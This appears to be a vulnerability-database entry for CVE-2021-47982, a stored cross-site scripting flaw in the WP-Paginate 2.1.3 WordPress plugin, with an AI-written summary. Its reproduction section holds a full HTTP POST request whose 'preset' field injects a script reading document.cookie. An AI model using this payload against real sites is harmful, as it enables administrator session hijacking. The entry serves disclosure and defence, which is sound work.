CVE-2021-47982
Description
WordPress Plugin WP-Paginate 2.1.3 has a stored XSS vulnerability allowing authenticated users to inject scripts via the preset parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
WordPress Plugin WP-Paginate 2.1.3 has a stored XSS vulnerability allowing authenticated users to inject scripts via the preset parameter.
Vulnerability
The WordPress Plugin WP-Paginate version 2.1.3 contains a stored cross-site scripting (XSS) vulnerability. This vulnerability exists in the preset parameter, which is accessible on the plugin's settings page. Authenticated attackers can exploit this by submitting POST requests with malicious script payloads in the preset parameter [2, 3].
Exploitation
An attacker with authenticated access to the WordPress admin area can exploit this vulnerability. The attacker needs to send a POST request to the plugin's settings page (wp-admin/options-general.php?page=wp-paginate.php) and include a script payload within the preset parameter. This payload will be stored by the plugin [2].
Impact
When an administrator views the plugin's settings page, the stored malicious script will be executed in their browser. This can lead to various consequences depending on the injected script, such as session hijacking, unauthorized actions on behalf of the administrator, or defacement of the website. The scope of the compromise is limited to the privileges of the administrator viewing the page [2, 3].
Mitigation
Not yet disclosed in the available references. The vulnerability affects WP-Paginate versions up to and including 2.1.3 [3].
AI Insight generated on Jun 8, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: <2.1.3
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The 'preset' parameter in the WP-Paginate plugin is not properly sanitized before being stored and displayed, allowing for cross-site scripting."
Attack vector
An authenticated attacker can submit a POST request to the plugin's settings page (`options-general.php?page=wp-paginate.php`) with a malicious script payload in the 'preset' parameter [ref_id=1]. This payload is then stored by the plugin. When an administrator views the plugin's settings page, the stored script is executed within their browser context [ref_id=1].
Affected code
The vulnerability resides within the WP-Paginate plugin, specifically in how it handles the 'preset' parameter on the settings page. The exploit details indicate that the POST request targets `options-general.php?page=wp-paginate.php` and manipulates the 'preset' field [ref_id=1].
What the fix does
The patch is not provided in the bundle. The advisory indicates that the vulnerability is in version 2.1.3 and suggests updating to a patched version. Without the patch details, the specific code changes that address the sanitization of the 'preset' parameter cannot be described.
Preconditions
- authThe attacker must be authenticated to WordPress.
- inputThe attacker must be able to submit a POST request with a crafted 'preset' parameter.
Reproduction
POST /wp-admin/options-general.php?page=wp-paginate.php HTTP/1.1 Host: localhost Content-Length: 348 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/wp-admin/options-general.php?page=wp-paginate.php Accept-Encoding: gzip, deflate Accept-Language: ko,en-US;q=0.9,en;q=0.8 Cookie: wordpress_5b1d7751a3da8a97505638936b7963ae=root%7C1609175102%7CsmSXDMcLQrRT6VE8KfGkKmVhXgpnCEAYtWIzvd91r78%7C94877ae306a5c59f9cdb81adc60a8cd6ad84e0e7551b18042ee0a33c9ab5cb31; wordpress_test_cookie=WP%20Cookie%20check; asp_transient_id=36985e31f4be2b5ae0e14586c592c87d; wp-settings-1=mfold%3Do%26editor%3Dhtml%26posts_list_mode%3Dlist%26unfold%3D1; wp-settings-time-1=1609001802; wordpress_logged_in_5b1d7751a3da8a97505638936b7963ae=root%7C1609175102%7CsmSXDMcLQrRT6VE8KfGkKmVhXgpnCEAYtWIzvd91r78%7Cd570540f18447db0f0859be9e8e14bab64da22c8cf50fb8a80ebea73f188cb48 Connection: close
_wpnonce=8441c7c7b9&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-paginate.php&title=Pages%3A&previouspage=%26laquo%3B&nextpage=%26raquo%3B&position=none&font=font-inherit&preset=default& *preset='%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3e* &before=%3Cdiv+class%3D%22navigation%22%3E&after=%3C%2Fdiv%3E&empty=on&css=on&range=3&anchor=1&gap=3&wp_paginate_save=Save+Changes [ref_id=1]
Generated on Jun 8, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3News mentions
0No linked articles in our index yet.